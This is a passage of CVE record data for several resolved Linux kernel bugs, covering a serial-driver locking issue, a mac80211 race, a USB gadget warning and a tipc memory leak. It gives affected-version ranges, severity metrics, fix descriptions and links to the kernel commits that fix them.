"lessThan": "94b0e65c75f4af888ab2dd6c90f060f762924e86",
"status": "affected",
"version": "4d90bb147ef6b91f529a21b498ff2b5fdc6785b4",
"versionType": "git"
},
{
"lessThan": "54c4ec5f8c471b7c1137a1f769648549c423c026",
"status": "affected",
"version": "4d90bb147ef6b91f529a21b498ff2b5fdc6785b4",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/mxs-auart.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.18"
},
{
"lessThan": "3.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.158",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.88",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.29",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.158",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.88",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.29",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.8",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nserial: mxs-auart: add spinlock around changing cts state\n\nThe uart_handle_cts_change() function in serial_core expects the caller\nto hold uport-\u003elock. For example, I have seen the below kernel splat,\nwhen the Bluetooth driver is loaded on an i.MX28 board.\n\n [ 85.119255] ------------[ cut here ]------------\n [ 85.124413] WARNING: CPU: 0 PID: 27 at /drivers/tty/serial/serial_core.c:3453 uart_handle_cts_change+0xb4/0xec\n [ 85.134694] Modules linked in: hci_uart bluetooth ecdh_generic ecc wlcore_sdio configfs\n [ 85.143314] CPU: 0 PID: 27 Comm: kworker/u3:0 Not tainted 6.6.3-00021-gd62a2f068f92 #1\n [ 85.151396] Hardware name: Freescale MXS (Device Tree)\n [ 85.156679] Workqueue: hci0 hci_power_on [bluetooth]\n (...)\n [ 85.191765] uart_handle_cts_change from mxs_auart_irq_handle+0x380/0x3f4\n [ 85.198787] mxs_auart_irq_handle from __handle_irq_event_percpu+0x88/0x210\n (...)"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:01:51.767Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/56434e295bd446142025913bfdf1587f5e1970ad"
},
{
"url": "https://git.kernel.org/stable/c/21535ef0ac1945080198fe3e4347ea498205c99a"
},
{
"url": "https://git.kernel.org/stable/c/0dc0637e6b16158af85945425821bfd0151adb37"
},
{
"url": "https://git.kernel.org/stable/c/479244d68f5d94f3903eced52b093c1e01ddb495"
},
{
"url": "https://git.kernel.org/stable/c/2c9b943e9924cf1269e44289bc5e60e51b0f5270"
},
{
"url": "https://git.kernel.org/stable/c/5f40fd6ca2cf0bfbc5a5c9e403dfce8ca899ba37"
},
{
"url": "https://git.kernel.org/stable/c/94b0e65c75f4af888ab2dd6c90f060f762924e86"
},
{
"url": "https://git.kernel.org/stable/c/54c4ec5f8c471b7c1137a1f769648549c423c026"
}
],
"title": "serial: mxs-auart: add spinlock around changing cts state",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27000",
"datePublished": "2024-05-01T05:28:35.749Z",
"dateReserved": "2024-02-19T14:20:24.207Z",
"dateUpdated": "2025-11-04T17:16:13.339Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26779 (GCVE-0-2024-26779)
Vulnerability from cvelistv5
Published
2024-04-03 17:01
Modified
2025-05-04 08:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: mac80211: fix race condition on enabling fast-xmit
fast-xmit must only be enabled after the sta has been uploaded to the driver,
otherwise it could end up passing the not-yet-uploaded sta via drv_tx calls
to the driver, leading to potential crashes because of uninitialized drv_priv
data.
Add a missing sta->uploaded check and re-check fast xmit after inserting a sta.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26779",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-03T19:22:50.891620Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-362",
"description": "CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-06T21:39:37.576Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.469Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/76fad1174a0cae6fc857b9f88b261a2e4f07d587"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/85720b69aef177318f4a18efbcc4302228a340e5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5ffab99e070b9f8ae0cf60c3c3602b84eee818dd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/88c18fd06608b3adee547102505d715f21075c9d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eb39bb548bf974acad7bd6780fe11f9e6652d696"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/54b79d8786964e2f840e8a2ec4a9f9a50f3d4954"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/281280276b70c822f55ce15b661f6d1d3228aaa9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bcbc84af1183c8cf3d1ca9b78540c2185cd85e7f"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/mac80211/sta_info.c",
"net/mac80211/tx.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "76fad1174a0cae6fc857b9f88b261a2e4f07d587",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "85720b69aef177318f4a18efbcc4302228a340e5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "5ffab99e070b9f8ae0cf60c3c3602b84eee818dd",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "88c18fd06608b3adee547102505d715f21075c9d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "eb39bb548bf974acad7bd6780fe11f9e6652d696",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "54b79d8786964e2f840e8a2ec4a9f9a50f3d4954",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "281280276b70c822f55ce15b661f6d1d3228aaa9",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "bcbc84af1183c8cf3d1ca9b78540c2185cd85e7f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/mac80211/sta_info.c",
"net/mac80211/tx.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.308",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.308",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.270",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mac80211: fix race condition on enabling fast-xmit\n\nfast-xmit must only be enabled after the sta has been uploaded to the driver,\notherwise it could end up passing the not-yet-uploaded sta via drv_tx calls\nto the driver, leading to potential crashes because of uninitialized drv_priv\ndata.\nAdd a missing sta-\u003euploaded check and re-check fast xmit after inserting a sta."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:56:19.344Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/76fad1174a0cae6fc857b9f88b261a2e4f07d587"
},
{
"url": "https://git.kernel.org/stable/c/85720b69aef177318f4a18efbcc4302228a340e5"
},
{
"url": "https://git.kernel.org/stable/c/5ffab99e070b9f8ae0cf60c3c3602b84eee818dd"
},
{
"url": "https://git.kernel.org/stable/c/88c18fd06608b3adee547102505d715f21075c9d"
},
{
"url": "https://git.kernel.org/stable/c/eb39bb548bf974acad7bd6780fe11f9e6652d696"
},
{
"url": "https://git.kernel.org/stable/c/54b79d8786964e2f840e8a2ec4a9f9a50f3d4954"
},
{
"url": "https://git.kernel.org/stable/c/281280276b70c822f55ce15b661f6d1d3228aaa9"
},
{
"url": "https://git.kernel.org/stable/c/bcbc84af1183c8cf3d1ca9b78540c2185cd85e7f"
}
],
"title": "wifi: mac80211: fix race condition on enabling fast-xmit",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26779",
"datePublished": "2024-04-03T17:01:09.807Z",
"dateReserved": "2024-02-19T14:20:24.177Z",
"dateUpdated": "2025-05-04T08:56:19.344Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35822 (GCVE-0-2024-35822)
Vulnerability from cvelistv5
Published
2024-05-17 13:23
Modified
2025-05-04 09:06
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
usb: udc: remove warning when queue disabled ep
It is possible trigger below warning message from mass storage function,
WARNING: CPU: 6 PID: 3839 at drivers/usb/gadget/udc/core.c:294 usb_ep_queue+0x7c/0x104
pc : usb_ep_queue+0x7c/0x104
lr : fsg_main_thread+0x494/0x1b3c
Root cause is mass storage function try to queue request from main thread,
but other thread may already disable ep when function disable.
As there is no function failure in the driver, in order to avoid effort
to fix warning, change WARN_ON_ONCE() in usb_ep_queue() to pr_debug().
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35822",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-17T17:16:32.231234Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:33:25.911Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.531Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2b002c308e184feeaeb72987bca3f1b11e5f70b8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/68d951880d0c52c7f13dcefb5501b69b8605ce8c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3e944ddc17c042945d983e006df7860687a8849a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/df5cbb908f1687e8ab97e222a16b7890d5501acf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f74c5e0b54b02706d9a862ac6cddade30ac86bcf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/99731076722eb7ed26b0c87c879da7bb71d24290"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/36177c2595df12225b95ce74eb1ac77b43d5a58c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/30511676eb54d480d014352bf784f02577a10252"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2a587a035214fa1b5ef598aea0b81848c5b72e5e"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/gadget/udc/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "2b002c308e184feeaeb72987bca3f1b11e5f70b8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "68d951880d0c52c7f13dcefb5501b69b8605ce8c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "3e944ddc17c042945d983e006df7860687a8849a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "df5cbb908f1687e8ab97e222a16b7890d5501acf",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f74c5e0b54b02706d9a862ac6cddade30ac86bcf",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "99731076722eb7ed26b0c87c879da7bb71d24290",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "36177c2595df12225b95ce74eb1ac77b43d5a58c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "30511676eb54d480d014352bf784f02577a10252",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2a587a035214fa1b5ef598aea0b81848c5b72e5e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/gadget/udc/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: udc: remove warning when queue disabled ep\n\nIt is possible trigger below warning message from mass storage function,\n\nWARNING: CPU: 6 PID: 3839 at drivers/usb/gadget/udc/core.c:294 usb_ep_queue+0x7c/0x104\npc : usb_ep_queue+0x7c/0x104\nlr : fsg_main_thread+0x494/0x1b3c\n\nRoot cause is mass storage function try to queue request from main thread,\nbut other thread may already disable ep when function disable.\n\nAs there is no function failure in the driver, in order to avoid effort\nto fix warning, change WARN_ON_ONCE() in usb_ep_queue() to pr_debug()."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:06:10.159Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/2b002c308e184feeaeb72987bca3f1b11e5f70b8"
},
{
"url": "https://git.kernel.org/stable/c/68d951880d0c52c7f13dcefb5501b69b8605ce8c"
},
{
"url": "https://git.kernel.org/stable/c/3e944ddc17c042945d983e006df7860687a8849a"
},
{
"url": "https://git.kernel.org/stable/c/df5cbb908f1687e8ab97e222a16b7890d5501acf"
},
{
"url": "https://git.kernel.org/stable/c/f74c5e0b54b02706d9a862ac6cddade30ac86bcf"
},
{
"url": "https://git.kernel.org/stable/c/99731076722eb7ed26b0c87c879da7bb71d24290"
},
{
"url": "https://git.kernel.org/stable/c/36177c2595df12225b95ce74eb1ac77b43d5a58c"
},
{
"url": "https://git.kernel.org/stable/c/30511676eb54d480d014352bf784f02577a10252"
},
{
"url": "https://git.kernel.org/stable/c/2a587a035214fa1b5ef598aea0b81848c5b72e5e"
}
],
"title": "usb: udc: remove warning when queue disabled ep",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35822",
"datePublished": "2024-05-17T13:23:24.994Z",
"dateReserved": "2024-05-17T12:19:12.346Z",
"dateUpdated": "2025-05-04T09:06:10.159Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36954 (GCVE-0-2024-36954)
Vulnerability from cvelistv5
Published
2024-05-30 15:35
Modified
2025-05-04 12:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tipc: fix a possible memleak in tipc_buf_append
__skb_linearize() doesn't free the skb when it fails, so move
'*buf = NULL' after __skb_linearize(), so that the skb can be
freed on the err path.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 4b1761898861117c97066aea6c58f68a7787f0bf Version: 64d17ec9f1ded042c4b188d15734f33486ed9966 Version: 6da24cfc83ba4f97ea44fc7ae9999a006101755c Version: b7df21cf1b79ab7026f545e7bf837bd5750ac026 Version: b7df21cf1b79ab7026f545e7bf837bd5750ac026 Version: b7df21cf1b79ab7026f545e7bf837bd5750ac026 Version: b7df21cf1b79ab7026f545e7bf837bd5750ac026 Version: b7df21cf1b79ab7026f545e7bf837bd5750ac026 Version: b2c8d28c34b3070407cb1741f9ba3f15d0284b8b Version: 5489f30bb78ff0dafb4229a69632afc2ba20765c Version: 436d650d374329a591c30339a91fa5078052ed1e Version: ace300eecbccaa698e2b472843c74a5f33f7dce8 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:43:50.499Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/01cd1b7b685751ee422d00d050292a3d277652d6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2f87fd9476cf9725d774e6dcb7d17859c6a6d1ae"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/adbce6d20da6254c86425a8d4359b221b5ccbccd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/42c8471b0566c7539e7dd584b4d0ebd3cec8cb2c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d03a82f4f8144befdc10518e732e2a60b34c870e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/614c5a5ae45a921595952117b2e2bd4d4bf9b574"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3210d34fda4caff212cb53729e6bd46de604d565"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/97bf6f81b29a8efaf5d0983251a7450e5794370d"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36954",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:15:38.594682Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:59.306Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
